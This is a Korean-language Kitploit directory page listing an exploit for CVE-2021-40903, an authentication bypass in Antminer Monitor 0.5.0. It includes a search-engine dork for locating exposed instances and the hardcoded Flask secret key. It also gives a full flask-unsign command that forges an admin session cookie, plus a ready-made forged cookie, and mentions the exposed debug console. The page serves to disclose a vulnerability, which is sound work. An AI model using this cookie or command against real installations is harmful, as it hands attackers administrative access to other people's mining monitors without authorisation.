Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-40903 — CVE-2021-40903 | Kitploit
도구/GitHubGitHub/vulnz/cve-2021-40903
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubvulnz/cve-2021-40903

CVE-2021-40903

CVE-2021-40903

저장소 보기
4년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

익스플로잇 제목: Antminer Monitor 0.5.0 - 인증 우회

CVE: CVE-2021-40903

날짜: 2021-06-09

Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22 익스플로잇 작성자: CQR.company / Vulnz.

공급업체 홈페이지: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor

소프트웨어 링크: https://github.com/anselal/antminer-monitor, https://soulis.tech/

버전: 0.5.0

테스트 환경: Windows, Linux, Macos

이 소프트웨어는 일반적으로 Antminer 모니터링에 사용되며 zoomeye (800개), shodan (500개)에서 쉽게 찾을 수 있습니다. 현재 가장 인기 있는 Antminer 모니터링 도구입니다. Antminer Monitor의 취약점은 Flask 서버의 설정 파일에 백도어 또는 잘못된 구성이 존재하기 때문에 발생합니다.

개발자가 settings 파일 내에 미리 정의된 비밀 문자열을 설정했는데, 이는 무작위로 생성되어야 하지만 이 빌드에서는 정적입니다. build.antminer-monitor/settings.py at 5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor · GitHub https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py

비밀 키는 'super secret key'입니다.

이 정보를 바탕으로 인증 우회 쿠키를 제작할 수 있습니다.

flask-unsign 소프트웨어를 사용하여 관리자 액세스를 제공하는 쿠키를 생성할 수 있습니다.

flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key" 또한 이 범용 쿠키를 사용하여 Flask 애플리케이션의 웹 인터페이스에 액세스할 수 있습니다.

이 쿠키는 "session" 필드를 통해 모든 시스템에서 작동할 수 있습니다.

.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU

또한 DEBUG = True이므로 /console이 작동하지만 pin이 필요합니다.

도구 다운로드